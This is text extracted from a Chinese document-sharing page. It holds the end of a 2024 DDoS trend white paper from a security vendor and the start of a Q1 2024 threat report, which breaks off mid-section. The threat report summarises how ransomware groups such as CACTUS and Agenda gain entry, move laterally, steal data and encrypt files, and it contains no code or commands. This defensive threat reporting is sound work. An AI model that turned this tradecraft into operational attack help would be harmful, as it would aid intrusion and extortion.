DDoS 攻击,其最快快网络 2024 年 DDoS 攻击趋势白皮书6/29高攻击速度为 704.8 Mpps。快快网络缓解的 10 次最大 DDoS 攻击中有 8 次都发生在过去 18 个月内。1.31.3 攻击类型攻击类型在主要攻击类型中,UDP flood 继续占据主导地位,占 DDoS攻击的 62%。TCP flood 和 ICMP 攻击也仍然很流行,分别占总数的 16%和 12%。所有其他 DDoS 攻击类型,包括 SYN、SYN ACKFlood 和 RST Flood,合计仅占 10%。虽然一些攻击者可能会使用这些更复杂的方法,但大多数攻击者仍然专注于提供大量数据包来摧毁服务器。图 4 DDoS 攻击类型1.41.4 攻击源分布攻击源分布攻击源的全球传播表明了网络威胁的无国界性质,攻击者可以跨越国界进行操作。其中美国位居第一,占 53.4%。德国(26%)、英国(25.8%)、荷兰(24.8%)、法国(23.9%)位列前 5。快快网络 2024 年 DDoS 攻击趋势白皮书7/29图 5 攻击源地理位置占比DDoS 攻击源的地理分布为制定有针对性的防御策略,以及制定旨在打击网络犯罪的国际政策提供了重要信息。然而,由于使用 IP欺骗等技术以及分布式僵尸网络的参与,确定攻击者的真实位置具有一定难度。1.5 目标目标行业行业与 2022 年游戏行业占据第一不同的是,2023 年,金融机构经历了近 30%的攻击活动,排在第一。但互联网依然是 DDoS 攻击的重灾区,占所有 DDoS 攻击的 22.2%。其他成为 DDoS 攻击目标的行业包括医疗保健(14.2%)、政府(11.5%)、运输和物流(8.64%)以及游戏(3.09%)。快快网络 2024 年 DDoS 攻击趋势白皮书8/29图 6 受影响行业占比分布快快网络 2024 年 DDoS 攻击趋势白皮书9/29快快网络 2024 年 DDoS 攻击趋势白皮书10/292.2.20232023 年国内年国内 DDoSDDoS 攻击情况攻击情况2.1 国内攻击情况国内攻击情况2023 年,攻击频次逐年增长,大流量攻击频次保持高位,2023年全年 DDoS 攻击次数同比 2021 年增长 80%,以关键信息基础设施为目标的高烈度 DDoS 攻击已跃升成为国家级网络安全威胁之首。图 7 国内攻击情况2.2 攻击目标地域分布攻击目标地域分布密集型扫段攻击导致攻击目标地域发生聚集。2023 年中国遭受DDoS 攻击最多的地域为浙江,占全国 33.17%,其次为广东、湖南、江苏、福建、山东、湖北、河南、陕西、四川。快快网络 2024 年 DDoS 攻击趋势白皮书11/29图 8 攻击目标中国大陆地域分布快快网络 2024 年 DDoS 攻击趋势白皮书12/292.3 瞬时攻击速度攀升瞬时攻击速度攀升图 9 超百 G瞬时泛洪攻击流量爬升图 10 T 级瞬时泛洪攻击流量爬升趋势快快网络 2024 年 DDoS 攻击趋势白皮书13/292023 年,从攻击时长来看,短时攻击依然常见。86%的攻击持续时间不到 1 小时,1-2 分钟的攻击占全年攻击的 23.44%。攻击者倾向于在短时间内,以极大的流量导致目标服务用户掉线、延时和抖动。从瞬时泛洪攻击速度来看,近几年瞬时泛洪攻击爬升速度持续攀升。瞬时泛洪攻击 2 秒流量即可爬升至近 500G,10 秒即可爬升至 T 级,大流量攻击爬升速度再创新高,挑战防御系统响应速度。2.4 扫段攻击扫段攻击图 11 扫段攻击频次快速增长2023 年 H2 扫段攻击频次激增,攻击手法持续演进,成为网络基础设施最大威胁。从扫段速率来看,低速扫段占比 73.91%,低速扫段单 IP 流量低,挑战传统检测算法有效性;单个 C 段攻击持续时间占比中,扫段攻击多采用“短平快”战术5 分钟的攻击占比 43.26%,挑战防御快快网络 2024 年 DDoS 攻击趋势白皮书14/29系统响应速度;扫段攻击手法中,86.96%的扫段攻击采用混合攻击手法,防御困难;从扫段攻击类型分布来看,反射攻击提升带宽拥塞威胁,虚假源泛洪攻击加大防御难度。扫段攻击因威胁范围广,扫段攻击的频次、复杂度持续攀升,攻击者惯用“短平快”战术,导致检测难、引流难、防御难、防御成本高,已成为攻击网络基础设施的惯用手段。快快网络 2024 年 DDoS 攻击趋势白皮书15/29快快网络 2024 年 DDoS 攻击趋势白皮书16/293.3.快快网络快快网络 DDoSDDoS 态势观察态势观察通过分析快快网络所保护的各个行业和地区的客户所经历的多个威胁检测,整体 DDoS 威胁呈上升趋势,且增长惊人。3.1 攻击情况攻击情况2023 年,快快网络共计成功防护 58.4 万起 DDoS 网络攻击,同比增长 151.7%。1 月-3 月 DDoS 网络攻击次数较低,6 月份、8 月份攻击次数最多,占全年 22.7%。2023 年,攻击流量峰值 Q1-Q2 季度增至 800 Gbps,2023 年Q3-Q4 季度增至 1600 Gbps(1.6 Tbps),越来越多的 DDoS 攻击开始使用僵尸网络,超过 38%的 DDoS 攻击利用了感染僵尸网络的设备。此外,与上一年相比,作为多向量攻击的烟幕弹/诱饵的 DDoS 攻击增加了 28%。图 12 快快网络 2023 年攻击流量峰值3.2 攻击类型攻击类型UDP 是迄今为止在大流量 DDoS 攻击中利用最多的协议。由于其无状态特性,UDP 允许合法服务被滥用,通过反射和放大攻击向受害者发送大量未经请求的流量。TCP SYN 和状态外数据包也被用于快快网络 2024 年 DDoS 攻击趋势白皮书17/29大容量攻击,但 TCP 协议通常作用是旨在耗尽设备和服务器上资源的攻击。在 流 量 攻 击 中,使 用 最 多 的 攻 击 向 量 是 UDP fragmentflood(43%),其次是 UDP flood(19.2%)和 TCP flood(14.4%)。图 13 DDoS 攻击类型3.3 攻击来源攻击来源攻击源的全球传播表明了网络威胁的无国界性质,攻击者可以跨越国界进行操作。其中美国位居第一,占 24%。印度尼西亚(17%)、荷兰(12%)、泰国(10%)、哥伦比亚(8%)、俄罗斯(8%)、乌克兰(5%)、墨西哥(3%)、德国(2%)和巴西(2%)位列前十,这说明全球面临着广泛的威胁。快快网络 2024 年 DDoS 攻击趋势白皮书18/29图 14 攻击来源DDoS 攻击源的地理分布为制定有针对性的防御策略,以及制定旨在打击网络犯罪的国际政策提供了重要信息。然而,由于使用 IP欺骗等技术以及分布式僵尸网络的参与,确定攻击者的真实位置具有一定难度。快快网络 2024 年 DDoS 攻击趋势白皮书19/293.4 攻击行业攻击行业图 15 受影响行业占比分布游戏行业仍然是受影响最严重的行业,遭受了 46%的攻击。金融行业位居第二,占 22%。电信(18%)、基础设施服务行业(7%)和计算机软件公司(3%)也成为重点目标。攻击者对游戏和金融领域特别感兴趣,这些行业一般具有较好的经济收益和用户基础,同时凸显了在受打击最严重的行业中需要有针对性网络安全策略的必要性。快快网络 2024 年 DDoS 攻击趋势白皮书20/29快快网络 2024 年 DDoS 攻击趋势白皮书21/294.4.典型攻防对抗案例典型攻防对抗案例4.1 接口攻防案例接口攻防案例快快网络安全团队接到某数藏平台应急响应请求,平台存在流量访问异常,用户无法登录或无法在平台进行购买下单操作现象,导致客户资产流失和声誉受损。防护难度:防护难度:该平台遭受有组织、有预谋的 DDoS 攻击,攻击目标主要是平台的 API 接口,支付接口等,攻击者通过 SYN Flood、ACK Flood、CC等多种类型攻击技术手段不断变换攻击形式。针对以上情况,快快网络提供以下解决方案:针对以上情况,快快网络提供以下解决方案:图 16 DDoS 安全防护架构部署图1、建立完善的监测预警机制,部署使用快快网络 DDoS 安全防护产品。结合快快网络自研 ADS 系统,加持机器学习及特征处置联动能力,扩大攻击可能性的捕捉范围,实时检测阻断各类 DDoS 攻击,快快网络 2024 年 DDoS 攻击趋势白皮书22/29并启动应急预案及时对攻击行为进行防护,为客户成功抵御 125G 的DDoS 攻击及百万级 CC 攻击。2、快快网络安全专家与该公司深度沟通配合和优化。定制 CC防护策略与智能防刷策略,实时检测并拦截攻击,终端用户无感知。4.2 大流量攻防案例大流量攻防案例某知名游戏公司在其运营期间遭受了大型 DDoS 流量攻击,导致游戏玩家在游玩过程中频繁遇到掉线、延迟、卡顿等问题,网络波动严重,严重影响了玩家的游戏体验。不仅如此,长时间的网络不稳定还可能导致玩家数据丢失、账号被盗等更严重的后果。防护难度:防护难度:DDoS 流量攻击规模高达 1.6T,攻击者使用了 ACK、PUSH、RESET 和 SYN 洪水攻击向量的组合。面对如此大规模复杂攻击时,快快网络安全团队快速响应,为其定制相应的 DDoS 防护解决方案,提供全方位保护。针对以上情况,快快网络提供以下解决方案:针对以上情况,快快网络提供以下解决方案:快快网络 2024 年 DDoS 攻击趋势白皮书23/29图 17 游戏盾架构部署图1、提供游戏盾 SDK 产品。通过 SDK 接入到客户的游戏 APP中,采用分布式高防御节点作为防御网关,抵御大流量 DDoS 攻击,可牵引至云堤清洗防御更大攻击。SDK 端与安全网关建立加密通信隧道,仅放行经过 SDK 和游戏安全网关鉴权的流量,彻底解决 TCP协议层的 CC 攻击。在 CC 攻击期间,CC 流量直接被防御网关拦截,未透到客户的源服务器,查看防御网关节点 CPU 使用率为 25-30%,并未达到警戒线 60%。CC 新建连接并发量达到 30w 时,无玩家反馈异常。2、基于 SDK 的网络链路诊断功能,智能选取优质网络传输路线,保证游戏时延最低,并创建断线重连机制,哪怕玩家本地 4G/wifi网络异常,也不会导致游戏掉线。快快网络 2024 年 DDoS 攻击趋势白皮书24/29快快网络 2024 年 DDoS 攻击趋势白皮书25/295.5.20242024 年可操作性策略年可操作性策略5.1 2023 年总结年总结从所有指标来看,情况正在迅速恶化。从所有指标来看,情况正在迅速恶化。自 2020 年初以来,全球 DDoS 攻击增加了 130%。每 3 秒就会发生一次新的网络攻击。全球每天大约发生 34153 次 DDoS 攻击。DDoS 攻击对任何企业来说都是昂贵的,但未受保护的企业每次攻击的平均成本为 20 万美元。即使是小型企业也受到了严重的打击平均一次 DDoS 攻击的恢复成本为 12 万美元。全球数字化程度的不断提高、政治动荡以及居家工作的广泛采用,都导致了一个容易受到 DDoS 攻击的环境。随着攻击数量和频率的增加,它们的规模、复杂程度以及最终的成功程度也在增加。当DDoS 攻击成功时,会给企业带来时间、金钱、客户和声誉损失。5.2 2024 年年 DDoS 攻击趋势攻击趋势趋势一:趋势一:DDoSDDoS 攻击持续增长攻击持续增长通过近几年从快快网络监测中心记录的大量 DDoS 攻击事件中可以发现:针对关键基础设施的攻击呈现数字化发展的特点,以DDoS 为代表的网络攻击预计会与日俱增,同时新型 DDoS 攻击从开始到攻击顶峰的时间已大幅缩短。攻击流量在短时间内达到峰值,而不是持续指数级增长。由于非常快地投放攻击载荷,这种“增强版攻击”会在常规保护措施发挥功效前就已导致网络系统瘫痪。这个趋势仍会持续,这类迅速爆发的 DDoS 攻击会越来越多。同时,快快网络 2024 年 DDoS 攻击趋势白皮书26/29DDoS 攻击继续会有更大的体量(每秒比特数和每秒数据包数)、持续时间也更长,这主要是由于物联网设备数量激增,加上网络犯罪分子可以调用托管云上更多不安全的计算能力和容量。趋势二:趋势二:恶意生成式恶意生成式 AIAI 将进一步加剧攻防不对等将进一步加剧攻防不对等2024 年,恶意生成式 AI 或将引发大规模网络攻击活动。生成式 AI 全面降低网络攻击的门槛,并更广泛地用于提高钓鱼邮件和社会工程攻击的专业化水平,使得勒索软件更容易进到企业。同时,生成式 AI 的攻击内容更加难以被辨别,尤其是借助 Bot 自动化攻击手段,让攻击者可以更快速、准确地扫描漏洞或对网络发起攻击,大幅增加网络攻击的波及面和有效性。这给原本处于攻防弱势的防护方以更大的管理和技术挑战,安全企业、厂商、服务商需要更多的创新、共享、协同,来应对这一巨大挑战。趋势趋势三三:构建整体全面的网络安全韧性将是企业重要战略之一构建整体全面的网络安全韧性将是企业重要战略之一随着地缘政治、新冠疫情、技术变革等诸多因素的演变,“韧性”成为高频词,出现在各种复杂问题解决方案中。网络安全韧性是指企业组织在面临包括网络安全攻击、服务中断等在内的各种网络安全事件不利影响的局面下,能够继续企业业务运营并保持增长的能力。换句话而言,网络安全韧性是数字连续性在网络安全方面的具体展现,是属于企业整体数字连续性(以及业务连续性)的其中一部分。塑造一个既能够有效抵御风险,又可以实现快速恢复,具有更强韧性的网络安全架构事关重大。企业组织应该在战略层面上思考如何加强其关键系统、IT 基础设施和数据中心的数字连续性,以便在面对业务中断、网络安全威胁攻击、人为错误等不利局面时保持韧性。快快网络 2024 年 DDoS 攻击趋势白皮书27/295.3 防护策略防护策略如果说 2023 年是企业、政府机构和关键公共基础设施被高度复杂的网络攻击无情锁定的一年,那么可以肯定的是,网络犯罪分子将在 2024 年设定更高的目标。可被感染并变成僵尸网络的数字设备的激增,EMEA 和 APAC 地区数字基础设施的快速普及,以及欧洲和中东地区持续的地缘政治紧张局势,将继续营造一个混乱的环境,这对有动机的网络罪犯来说无疑是有利的。在这种情况下,快快网络建议企业采取以下三个可行策略:积极准备积极准备 DDoSDDoS 防护态势防护态势发动 DDoS 攻击的成本相对较低,特别是随着 DDoS 服务的普及,这使它们成为恶意行为者手中强有力的网络犯罪武器。虽然无法阻止 DDoS 攻击,但采取以下步骤可以最大限度地保护组织的数字资产免受此类攻击:检查组织所有的关键子网和 IP 空间,确保具备适当的缓解控制措施。以“始终在线”的防护态势部署 DDoS 安全控制措施作为第一层防御,以避免紧急集成场景,并减轻事件响应者的负担。主动指定一个危机响应小组,并确保运行手册和事件响应计划是最新的。当真的受到攻击时,不至于感到猝不及防。使用混合保护平台备份本地 DDoS 保护,该平台可防止使本地设备过载的攻击。通过网络云防火墙设置主动安全控制,将组织的安全态势扩展到基本 DDoS 保护之外。最后,利用知名和久经考验的 DDoS 团队的专业知识和经验来减轻来自关键内部资源的压力。快快网络 2024 年 DDoS 攻击趋势白皮书28/29保护保护 DNSDNS 基础设施基础设施DNS 基础设施重新成为 DDoS 攻击的主要目标。如果组织的 DNS出现故障,那么在线状态也会出现故障。攻击可能并不总是以使DNS 名称服务器瘫痪为目标。相反地,它可能只是希望实现资源耗尽,并降低全局服务器负载平衡性能,从而致使合法请求受到影响。在某些情况下,保护 DNS 基础架构的安全性和性能可能具有挑战性。很多时候,传统的 DNS 防火墙不能提供足够的保护。最优的解决方案应该是具备以下特征的混合平台:保护本地和云中的 DNS 区域免受各种攻击,包括 DNS 水刑(DNSwater torture)、DNS 洪水等;直观、轻松地管理策略和 IP 允许列表,并实时提供可操作的分析,帮助组织采取主动的安全态势;通过使用高度分布式的物理访问点(point-of-presence)基础设施来从最近的位置响应用户,从而提高 DNS 性能。快快网络 2024 年 DDoS 攻击趋势白皮书29/29结语结语在当前互联网形势下,DDoS 攻击呈现出攻击威力逐渐增强、攻击频率不断上升、攻击方式日趋多样化等趋势,在可预见的未来,DDoS 依然是流行的网络犯罪手段,为保障网络环境的安全性,急需采用有效的防御策略,不断加强网络安全意识教育,提高设备管理和容灾能力,以应对日益增长的 DDoS 攻击威胁。

    浏览量19人已浏览 发布时间2024-05-11 30页 推荐指数推荐指数推荐指数推荐指数推荐指数5星级
  • 亚信安全:2024年第一季度安全威胁报告(48页).pdf

    -1-亚信安全2024年 第一季度 网络安全威胁报告 应急响应中心 2024年5月 -2-前言前言 亚信安全2024年第一季度网络安全威胁报告的发布旨在从一个全面的视角解析当前的网络安全威胁环境。此报告通过详尽梳理和总结2024年第一季度的网络攻击威胁,目的是提供一个准确和直观的终端威胁感知。帮助用户更好地识别网络安全风险,并采取有效的防御策略。如下是报告内容摘要:2024年第一季度,亚信安全积极应对威胁,共截获了8,378,240个恶意样本,平均每天拦截9万个恶意样本。2024年第一季度,亚信安全拦截勒索软件攻击共计12,603次,从全球拦截数量分析,科威特位居勒索软件感染数量首位,占比达到36%,其次是土耳其和阿拉伯联合酋长国。从勒索攻击行业分析,全球银行业以29%的比重居首位,其次是科技行业和政府。而我国则是制造业遭遇勒索攻击居首位,其次是医疗和通信行业。漏洞利用依然是勒索行为的主要攻击手段。同时,勒索软件越来越倾向于进行跨平台攻击,其使用的加密技术也在持续提升。“银狐”组织通过即时通信软件和钓鱼邮件向财税相关人员发动定向攻击。亚信安全持续追踪“银狐”组织,发布了“银狐”治理方案。依托于技术、人员和服务,针对“银狐”木马进行事前风险排查,事中应急处置和事后安全加固。在攻防演练即将到来之际,亚信安全重磅发布攻防演练解决方案3.0。以攻击者视角评估企业暴露的外部攻击面,协助摸清家底、及时收敛外部风险资产、排查敏感数据泄密风险。模拟入侵攻击行为,验证现有安全防护体系的防护能力,包括钓鱼邮件、邮件网关、威胁情报、WAF、威胁防护、终端安全、数据保护等方面。亚信安全勒索攻击演练服务重磅发布。亚信安全通过分析历年勒索攻击事件,提取不同勒索团伙在勒索各阶段常用的攻击手段,孵化出一系列勒索攻击场景,通过模拟勒索攻击的方式,以此验证客户针对于勒索攻击不同阶段的防御能力。-3-目录目录 前言.-2-目录.-3-2024 年第一季度网络安全威胁分析.-4-一、2024 年第一季度共拦截 838 万个恶意样本.-4-二、勒索攻击态势分析.-6-三、“银狐”组织利用财税钓鱼发动定向攻击.-17-四、卷王“银狐”进化成“树狼”.-25-五、恶意软件伪装成名单册进行攻击.-30-2024 年第一季度网络安全威胁治理.-35-一、银狐治理方案发布.-35-二、攻防演练解决方案 3.0 重磅发布.-38-三、勒索攻击演练服务重磅发布.-40-2024 年第一季度网络安全数据分析.-42-一、病毒拦截信息统计.-42-二、勒索软件信息统计.-43-三、挖矿病毒信息统计.-45-四、漏洞攻击拦截统计.-47-4-2024年年第第一一季度季度网络安全网络安全威胁威胁分析分析 一、一、2 202024 4年年第第一一季度季度共拦截共拦截8 83838万个恶意万个恶意样本样本 2024年第一季度,亚信安全积极应对威胁,共截获了8,378,240个恶意样本,平均每天拦截9万个恶意样本。这些恶意样本包括各种恶意软件、病毒、木马等,它们的目标是危害个人用户、企业组织和公共机构的计算机系统和数据。与上个季度相比,第一季度拦截的恶意样本数量有所减少。这表明随着技术的进步和安全意识的增强,亚信安全的客户能够更加有效地抵御恶意攻击活动。尽管如此,数字威胁的不断演变使安全专家们不得不保持警惕,并持续开发出更强大的防御手段。这需要密切关注新的攻击技术和威胁趋势,并及时采取相应措施,例如实时监控、网络流量分析、威胁情报共享等,以提前发现并遏制恶意样本的传播。【2023年4月-2024年3月恶意样本月拦截数量图】从恶意样本检测类型来看TROJ(木马程序)以57%的比重位居首位,其次是PE(感染型病毒)、Adware(广告软件)、Mal(恶意软件)和WORM(蠕虫病毒)。这些病毒类型有其特定的功能和攻击方式。木马程序通常伪装成合法软件,秘密执行恶意活动,例如窃取个人信息或允许远程控制。PE感染型病毒利用可执行文件格式来传播恶意代码,常见于通过电子邮件或下载不安全文件时感染系统。广告软件则通过弹出广告来干扰用户,有时还会监控用户行为以投放定向广告。而广义上的Mal包括各类恶意软件,它们可能具有破坏数据、11243795 23506821 34121151 12190518 13646358 9011700 6927606 6052271 4282250 3642615 2056388 2679237 05,000,00010,000,00015,000,00020,000,00025,000,00030,000,00035,000,00040,000,000病毒检测情况病毒检测情况-5-窃取凭证或创建后门的功能。蠕虫病毒能自我复制并通过网络传播,它们不依赖于宿主文件,能快速在网络中造成广泛感染。【2024年第1季度恶意样本检测类型TOP 10】亚信安全将持续监控病毒发展趋势,继续致力于提供高效而可靠的安全解决方案,以确保用户和企业的数字资产得到充分的保护。同时,用户和组织也需保持警惕,采取必要的网络安全措施,如使用强密码、及时更新软件和系统补丁、谨慎点击可疑链接和附件等,以最大程度地降低受到威胁的风险。TROJ(木马程序)(木马程序)57%PE(感染型病毒)(感染型病毒)15ware(广告软件)(广告软件)10%Mal(恶意软件)(恶意软件)7%WORM(蠕虫病毒)(蠕虫病毒)4%EXPL(漏洞利用)(漏洞利用)3%HTML(HTML脚本病毒)脚本病毒)1%TSPY(间谍软件)(间谍软件)1%X97M(Excel宏病毒)宏病毒)1%W97M(Word宏病毒)宏病毒)1%-6-二二、勒索攻击态势分析勒索攻击态势分析 2024年第一季度,亚信安全拦截勒索攻击共计12,603次,较上一季度拦截攻击数量有所减少。从全球拦截数量看,科威特位居勒索软件感染数量首位,占比达到36%,其次是土耳其和阿拉伯联合酋长国。【2024第1季度勒索软件全球感染国家分布】本季度,全球多个国家的不同行业遭遇了勒索团伙攻击。其中,银行业遭遇勒索攻击的数量以 29%居首位,其次是科技行业和政府。而我国则是制造业遭遇勒索攻击居首位,其次是医疗和通信行业。【2024第1季度勒索软件攻击行业分布】科威特科威特36%土耳其土耳其27%阿拉伯联合酋长国阿拉伯联合酋长国9%印度印度6%巴西巴西5%智利智利5%卡塔尔卡塔尔4%美国美国3%南非南非3%以色列以色列2%银行银行29%科技科技25%政府政府15%医疗医疗6%交通交通5%石油和天然气石油和天然气5%金融金融4%通讯通讯4%制造业制造业4%传媒传媒3%-7-勒索团伙攻击事件分析勒索团伙攻击事件分析 除了分析感染国家和感染行业的分布,我们还对本季度的勒索攻击事件进行了深入研究。我们观察到,这些攻击背后的勒索团伙不仅包括新兴的团伙,还有包括一些“老牌”团伙再次浮现。我们详细梳理了五个典型的勒索案例,深入分析了这些勒索攻击事件背后的团伙,揭露了他们的攻击手法,并探讨了他们的未来发展趋势。这样的分析帮助我们更好地理解勒索软件的演变,以及制定有效的防护策略。LockBitLockBit新版本新版本LockBitLockBit-NGNG-DevDev勒索勒索 自 2020 年初开始运营 RaaS 组织的 LockBit 已发展成为勒索软件生态圈中最大的 RaaS组织之一,该组织目前已造成数千名受害者,是迄今为止对金融行业造成最大威胁的勒索组织。LockBit 勒索团伙使用联盟模式运营,在协商并支付赎金后,收益在开发人员及其关联公司之间分配。LockBit 通常收取 20%的赎金份额,其余 80%归负责勒索软件攻击的联盟成员所有。LockBit 以创新而闻名,其发布了多个版本的勒索软件,从最初的 v1(2020 年 1 月)到 LockBit 2.0(2021 年 6 月开始),再到 LockBit 3.0(从 2022 年 3 月开始)。勒索团伙引入了 LockBit Linux 来实现对 Linux 和 VMWare ESXi 系统的攻击。近日,我们发现了LockBit 新版本LockBit-NG-Dev,该版本是在今年2月19日LockBit 团伙被捣毁后发布的,说明LockBit 勒索团伙正在试图卷土重来。【LockBit 在其新的泄漏网站上公布的第一名受害者的帖子】该版本与以往的LockBit版本有所不同,采用了.NET编程语言并配合CoreRT编译,这使得它能在多个操作系统上运行。为了逃避静态检测,其使用MPRESS进行打包。除此之外,新版本具有多种加密模式,包括快速、间歇、全加密三种,其可以根据文件扩展名配置执行不同的加密模式。快速加密:只加密文件的第一个0 x1000字节。间歇性加密:根据配置加密文件的特定部分。全加密:加密整个文件。-8-LockBit-NG-Dev使用AES算法加密文件,并使用嵌入的RSA公钥加密AES密钥。AES密钥是为每个要加密的文件随机生成的。其将被加密文件进行随机命名,以增加数据恢复的难度。此外,它还配备了自删除机制,可以通过将LockBit文件内容覆盖为零字节来实现。善于利用善于利用WebWeb应用漏洞的应用漏洞的TellYouthePassTellYouthePass勒索勒索 2024年第一季度,研究人员监测到数千台运行财务管理服务的计算机设备被植入勒索软件。经关联分析,我们可以确认这一波攻击的来源为TellYouThePass老牌勒索家族。该家族最早于2019年3月出现,惯于在高危漏洞被披露后的短时间内利用漏洞修补的时间差,对暴露于网络上并存在有漏洞的机器发起攻击。其曾经使用永恒之蓝系列漏洞、WebLogic应用漏洞、Log4j2漏洞、国内某OA系统漏洞、国内某财务管理系统漏洞等。利用Web应用漏洞对运行应用的服务器发起勒索攻击是该勒索的典型特征。【Tellyouthepass攻击流程】Tellyouthepass勒索曾多次占据国内勒索软件流行榜的榜首位置。2023年,该勒索团伙发动了3轮较大规模的攻击,包括针对NC服务器勒索攻击,文档安全管理系统攻击和针对医药系统攻击,该系统常用于医药行业的智能仓储管理系统,具备库存盘点、库存对账等功能。黑客攻入该系统并投递勒索病毒,会导致系统中的库存数据库、商品标签等文件被加密,对部署该系统企业商户的数据及财产安全造成巨大威胁。2024年初,Tellyouthepass又开始发动新一轮针对财务电脑的攻击,此次攻击导致众多财务电脑中招,中招电脑的数据库与文档都被加密,并留下勒索信,被加密的文件扩展名被修改为“.locked”。-9-【TellYouthePass勒索信】利用利用VPNVPN漏洞攻击的漏洞攻击的CACTUSCACTUS勒索勒索 2024年初,针对某能源管理公司的勒索攻击引人注目。这次攻击发生在1月中旬,攻击导致该公司可持续发展业务部门丢失1.5TB的数据。此次攻击是因为勒索团伙利用了某软件漏洞获得了公司网络的访问权限,并提升了权限,在部署勒索软件之前进行了敏感数据的窃取。这一策略不仅加密了公司的文件,还威胁受害者,如果不支付赎金,将会泄露其敏感数据。该受害公司确认了此次攻击,并表示其仅受影响的实体是运营在独立网络基础设施上的业务部门。该部门提供有关可再生能源解决方案的咨询服务,并就全球环境和能源法规的遵守向公司提供建议。被盗数据可能包含客户能源使用情况、工业控制和自动化系统以及环境与能源法规遵守情况的敏感信息。另外,在确认受到攻击后,该公司采取了一系列措施来应对这一事件,包括与执法机构合作、加强其网络的安全防护以及通知受影响的客户。此外,公司也在审查其供应链管理和第三方组件的安全性,以减少未来遭受类似攻击的风险。经过调查,该起攻击事件幕后勒索团伙CACTUS浮出水面。该勒索于2023年3月首次被发现,一直保持着活跃状态。CACTUS勒索软件通过Fortinet VPN的已知漏洞进行入侵(黑客首先获取到VPN账号,再通过VPN服务器入侵到组织内部),获取初始访问权限。随后,勒索团伙会通过网络扫描,远控软件和RDP暴力破解在内网横向移动,窃取被害者的重要信息,并将窃取的信息传输到云存储中。最后,勒索团伙对被害机器进行勒索投毒。-10-【CACTUS攻击流程】在内网横向移动阶段,该勒索团伙使用Netscan、PSnmap的修改版本对域内机器进行网络扫描。通过使用PowerShell命令来枚举端点,在Windows事件查看器中查看成功登录来识别用户帐户,并ping远程主机。除此之外,勒索团伙还使用各种合法工具及远程软件对被害者机器进行控制,例如Splashtop、AnyDesk、SuperOps RMM、Cobalt Strike和基于Go的代理工具Chisel。另外,该勒索还通过RDP暴力破解获取内网访问权限。获取到内网机器的访问权限后,勒索团伙首先会窃取被害者的敏感信息,并使用Rclone等常见工具将窃取的信息传输到云存储中,然后再进行手动投毒。在勒索阶段,勒索团伙会威胁用户,如果不缴纳赎金,将会泄露窃取到的数据。在数据加密及数据泄露双重威胁下,用户缴纳赎金的概率将会提高。CACTUS勒索与以往勒索软件相比较,其最大不同之处是利用7-Zip进行防御规避。CACTUS 勒索软件使用批处理脚本提取 7-Zip加密保护的勒索软件二进制文件,然后在执行有效负载之前删除.7z文件。CACTUS勒索软件在加密前会初始化AES密钥以及OpenSSL库,通过OpenSSL库提供加密服务。其还通过创建计划任务达到持久化加密文件目的。在加密过程中,混合使用了 AES 和 RSA 算法,其中,使用 AES 算法对文件数据进行加密,并将加密后的数据写入文件中,然后使用 RSA 公钥对随机生成的加密密钥进行加密,并在文件夹中留下勒索信息说明文件。为防止受害者通过备份恢复数据,其会删除卷影副本。-11-【CACTUS勒索信】双重勒双重勒索索RA WorldRA World 2024年,RA World勒索软件继承了2021年解散的Babuk勒索软件团伙的源代码,发起了针对全球多个国家和地区的攻击,尤其集中在医疗保健和金融行业。这个团伙利用Babuk的源代码,开发出了新的勒索软件变种,对目标组织发动多阶段攻击,这些攻击涵盖了美国、德国、印度等医疗机构。RA World勒索团伙采用双重勒索策略,通过加密和窃取数据来迫使受害者支付赎金。该勒索软件通过入侵域控服务器获取到初始访问权限、通过计算机组策略对象(GPO)获取部署恶意组件所需的访问权限,禁用反病毒软件,最终在受害机器上部署勒索软件,并-12-加密文件。【RA World攻击流程】RA World勒索软件使用了curve25519和eSTREAM密码hc-128算法对文件进行加密,确保了加密过程的安全性,提升了加密文件的解密难度。其在加密文件后,会在被加密的文件名中添加后缀.RAWLD。【RA World勒索信】-13-实现跨平台攻击的实现跨平台攻击的Agenda Agenda 勒索勒索 2023年底,Agenda对某个全球最大的汽车零部件供应商进行网络攻击,并将其添加到Agenda Tor数据泄露勒索网站中。勒索团伙发布了多个泄露文件,以证明他们涉嫌访问了受害者的系统和文件,包括财务文件、保密协议、报价文件、技术数据表和内部报告。据悉,该汽车零部件开发商和制造商,在全球200 地点拥有超过50000名员工。该公司向众多知名车企销售内饰零部件。【Agenda/Qilin勒索信】经过调查,该起攻击事件是Agenda勒索团伙所为,Agenda勒索也被称为Qilin勒索,该家族的早期版本使用Go 语言编写的,增加了安全分析的难度。其早期版本是针对每位受害者定制的,使用受害者的机密信息(例如泄露的帐户和唯一的公司 ID)作为附加文件扩展名。2023年末,Agenda勒索开始逐渐活跃,今年年初,该家族推出了基于Rust 语言开发的版本,Rust 是一种跨平台语言,可以更轻松地针对 Windows 和 Linux 等不同操作系统定制恶意软件。除了在编译语言上发生变化,该版本勒索还使用间歇性加密方式,以提高加密速度和逃避检测。Agenda 勒索软件组织使用远程监控和管理(RMM)工具以及 Cobalt Strike 来部署勒索软件二进制文件,其通过 PsExec 和 SecureShell 传播,同时还可以利用不同的易受攻击的 SYS 驱动程序进行防御规避。Agenda勒索将使用自定义 PowerShell 脚本在 VMWare vCenter 和 ESXi 服务器之间传播,这可能会影响虚拟机甚至整个虚拟基础架构,导致数据和财务损失,以及虚拟环境中运行的服务中断。-14-【Agenda勒索攻击流程】勒索软件发展趋势勒索软件发展趋势 漏洞利用仍然是勒索的主要攻击手段漏洞利用仍然是勒索的主要攻击手段 TellYouThePass老牌勒索惯于在高危漏洞被披露后的短时间内利用漏洞修补的时间差,对暴露于网络上并存在有漏洞的机器发起攻击。其曾经使用永恒之蓝系列漏洞、WebLogic应用漏洞、Log4j2漏洞、国内某OA系统漏洞、国内某财务管理系统漏洞等。而CACTUS勒索软件通过Fortinet VPN的已知漏洞进行入侵。可见,利用漏洞攻击仍然是成功率较高的攻击方式之一,也是勒索团伙惯用的攻击手法之一。勒索病毒更青睐跨平台攻击勒索病毒更青睐跨平台攻击 跨平台攻击可以感染不同操作系统的设备,如Windows、Linux、Mac等,从而拓展了受害者的范围。无论受害者使用何种操作系统,都有可能成为攻击目标。不同操作系统具有不同的安全防护机制和补丁更新,攻击者可以通过跨平台传播来规避某些特定平台的安全措施。如果某个操作系统的安全性较高,攻击者可以选择攻击其他较为薄弱的操作系统。勒索病毒可以同时利用多个操作系统的漏洞或弱点进行入侵,从而提高了传播的效率。攻击者可以同时针对多个操作系统进行攻击,加快感染速度。勒索加密技术上不断地提升勒索加密技术上不断地提升 